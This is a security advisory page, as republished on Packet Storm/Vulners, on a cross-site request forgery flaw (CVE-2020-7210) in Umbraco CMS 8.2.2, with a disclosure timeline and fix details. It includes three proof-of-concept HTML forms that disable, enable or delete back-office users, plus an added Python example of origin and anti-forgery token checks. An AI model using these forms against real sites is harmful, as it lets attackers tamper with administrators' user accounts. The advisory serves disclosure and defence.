Umbraco CMS 8.2.2 Cross Site Request Forgery

23 Jan 2020 00:00:00 | Reported by A. Melnikova | Type: packetstorm | Source: packetstormsecurity.com | 168 Views

Cross-site request forgery in Umbraco CMS 8.2.2 lets an attacker enable, disable or delete user accounts by forging back-office requests in the session of an authenticated administrator; fixed in version 8.5.

Related entries (family | title | published):

CNVD | Umbraco CMS Cross-Site Request Forgery Vulnerability (CNVD-2020-04832) | 4 Feb 2020 00:00
CVE | CVE-2020-7210 | 23 Jan 2020 12:24
Cvelist | CVE-2020-7210 | 23 Jan 2020 12:24
EUVD | EUVD-2022-3995 | 3 Oct 2025 20:07
Github Security Blog | Umbraco CMS vulnerable to CSRF | 24 May 2022 17:07
NVD | CVE-2020-7210 | 23 Jan 2020 13:15
OSV | GHSA-GQQF-8CX6-9R7H Umbraco CMS vulnerable to CSRF | 24 May 2022 17:07
Prion | Cross site request forgery (csrf) | 23 Jan 2020 13:15
RedhatCVE | CVE-2020-7210 | 9 Jan 2026 09:59
Snyk | Cross-site Request Forgery (CSRF) | 24 May 2022 17:07
SEC Consult Vulnerability Lab Security Advisory < 20200123-0 >  
=======================================================================  
title: Cross-Site Request Forgery (CSRF)  
product: Umbraco CMS  
vulnerable version: version 8.2.2  
fixed version: version 8.5  
CVE number: CVE-2020-7210  
impact: medium  
homepage: https://umbraco.com/  
found: October 2019  
by: A. Melnikova (Office Moscow)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Europe | Asia | North America  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
"Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best  
version of Umbraco and a big step forward in regard to making your work  
with Umbraco simpler; simpler to extend, simpler to edit, simpler to  
publish - simpler to use, simpler to enjoy."  
  
Source: https://umbraco.com/products/umbraco-cms/umbraco-8/  
  
  
Business recommendation:  
------------------------  
The vendor provides a patch and users of this product are urged to  
immediately upgrade to the latest version available.  
  
SEC Consult recommends performing a thorough security review, conducted by  
security professionals, to identify and resolve all security issues.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Cross-Site Request Forgery (CSRF)  
An attacker can use cross-site request forgery to perform arbitrary web  
requests with the identity of the victim, without being noticed by the  
victim. This attack always requires some sort of user interaction; usually  
the victim needs to click on an attacker-prepared link or visit a page  
under the control of the attacker. Because the affected Umbraco back-office  
user-management endpoints accept such forged requests, an attacker is able to  
enable, disable or delete user accounts, which may lead to a denial of  
service for the affected accounts.  
  
  
Proof of concept:  
-----------------  
1) Cross-Site Request Forgery (CSRF)  
In a live attack scenario, the following HTML document would be hosted  
on a malicious website controlled by the attacker.  
  
Example 1: HTML code for disabling a user:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID>" method="POST">  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
Request:  
--------  
POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID> HTTP/1.1  
Host: <host-URL>  
[...]  
Cookie: <ADMIN-COOKIE>  
  
  
Response:  
---------  
HTTP/1.1 200 OK  
Cache-Control: no-store, must-revalidate, no-cache, max-age=0  
Pragma: no-cache  
Content-Length: 112  
Content-Type: application/json; charset=utf-8  
Expires: Mon, 01 Jan 1990 00:00:00 GMT  
Set-Cookie: <ADMIN-COOKIE>  
Date: Wed, 06 Nov 2019 10:57:45 GMT  
Connection: close  
  
)]}',  
{"notifications":[{"header":"<USERNAME> is now disabled","message":"","type":3}],"message":"<USERNAME> is now disabled"}  
  
  
Example 2: HTML code for enabling a user:  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID>" method="POST">  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
Request:  
--------  
POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds=<USER-ID> HTTP/1.1  
Host: <host-URL>  
[...]  
Cookie: <ADMIN-COOKIE>  
  
  
Response:  
---------  
HTTP/1.1 200 OK  
Cache-Control: no-store, must-revalidate, no-cache, max-age=0  
Pragma: no-cache  
Content-Length: 110  
Content-Type: application/json; charset=utf-8  
Expires: Mon, 01 Jan 1990 00:00:00 GMT  
Date: Wed, 06 Nov 2019 10:58:12 GMT  
Connection: close  
  
)]}',  
{"notifications":[{"header":"<USERNAME> is now enabled","message":"","type":3}],"message":"<USERNAME> is now enabled"}  
  
  
Example 3: HTML code for deleting a user:  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="https://<host-URL>/umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID>" method="POST">  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
Request:  
--------  
POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id=<USER-ID> HTTP/1.1  
Host: <host-URL>  
[...]  
Cookie: <ADMIN-COOKIE>  
  
  
Response:  
---------  
HTTP/1.1 200 OK  
Cache-Control: no-store, must-revalidate, no-cache, max-age=0  
Pragma: no-cache  
Content-Length: 114  
Content-Type: application/json; charset=utf-8  
Expires: Mon, 01 Jan 1990 00:00:00 GMT  
Set-Cookie: <ADMIN-COOKIE>  
Date: Wed, 06 Nov 2019 10:58:36 GMT  
Connection: close  
  
)]}',  
{"notifications":[{"header":"User <USERNAME> was deleted","message":"","type":3}],"message":"User <USERNAME> was deleted"}  
  
  
As soon as an authenticated victim (an administrator) visits a website with this  
HTML code embedded, the forged request is issued in the context of the victim's  
session. Although the responses to these requests are not delivered to the  
attacker, in many cases it is sufficient to be able to compromise the  
integrity of the victim's information stored on the site, or to perform  
certain, possibly compromising, requests to other sites.  
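The two server-side checks that close this gap, shown as an added Python example that is not part of the advisory or of Umbraco's own code: a same-origin check on the Origin/Referer header and a double-submit anti-forgery token, both enforced for every state-changing request to the back-office API. The site origin, the token cookie and header names, and the sample requests are assumptions constructed for the example.

```python
import hmac
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Assumed deployment values (constructed for this example, not from the advisory).
SITE_ORIGIN = "https://cms.example"
TOKEN_COOKIE = "XSRF-TOKEN"     # token the server sets as a cookie ...
TOKEN_HEADER = "X-XSRF-TOKEN"   # ... and expects the legitimate UI to echo here
UNSAFE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}

@dataclass
class Request:
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    cookies: dict = field(default_factory=dict)

def _origin_of(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()

def csrf_verdict(req: Request) -> str:
    """Return 'allow', or 'reject: <reason>' for a forged back-office request."""
    if req.method.upper() not in UNSAFE_METHODS:
        return "allow"  # safe methods must not change state, so nothing to forge
    if not req.path.startswith("/umbraco/backoffice/"):
        return "allow"  # only the back-office API is in scope for this check
    # Check 1: a cross-site form post carries the attacker page's Origin
    # (or Referer); a request with neither header is rejected as well.
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return "reject: no Origin/Referer on state-changing request"
    if _origin_of(src) != SITE_ORIGIN:
        return f"reject: cross-site origin {_origin_of(src)}"
    # Check 2: double-submit token. The attacker's page cannot read the
    # victim's cookies, so it cannot reproduce the token in a request header.
    cookie_tok, header_tok = req.cookies.get(TOKEN_COOKIE), req.headers.get(TOKEN_HEADER)
    if not (cookie_tok and header_tok and hmac.compare_digest(cookie_tok, header_tok)):
        return "reject: anti-forgery token missing or mismatched"
    return "allow"

# Constructed sample: the request the PoC form above produces when the victim
# submits it (session cookie present, attacker Origin, no token header) -> rejected.
FORGED = Request("POST", "/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID>",
                 headers={"Origin": "https://attacker.example"},
                 cookies={"session": "<ADMIN-COOKIE>"})
# Constructed sample: the same call issued by the back-office UI itself -> allowed.
LEGIT = Request("POST", "/umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds=<USER-ID>",
                headers={"Origin": SITE_ORIGIN, TOKEN_HEADER: "t0k3n"},
                cookies={"session": "<ADMIN-COOKIE>", TOKEN_COOKIE: "t0k3n"})
```

Either check alone would already stop the PoC forms above; keeping both means a request is still rejected when a browser omits the Origin header or a proxy strips it.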
  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following version was tested and found to be vulnerable:  
* version 8.2.2  
  
  
Vendor contact timeline:  
------------------------  
2019-11-13: Contacting vendor through [email protected].  
2019-11-13: Requesting encryption keys.  
2019-11-14: Encryption issues.  
2019-11-15: Encryption issues, sending advisory in unencrypted form.  
2019-11-25: No response, requesting status update.  
2019-11-28: Vendor confirmed vulnerability.  
2020-01-03: Confirming the release date.  
2020-01-14: Release of updated CMS version 8.5.0.  
2020-01-23: Release of security advisory.  
  
  
Solution:  
---------  
The vendor provides an updated version which should be installed immediately:  
https://our.umbraco.com/download/releases/850  
  
  
Workaround:  
-----------  
No workaround available.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Europe | Asia | North America  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/career/index.html  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/contact/index.html  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF A. Melnikova / @2020  
  

Vulners scoring (23 Jan 2020 00:00, current): Vulners AI Score 0.9 (low risk), EPSS 0.00232, 168 views.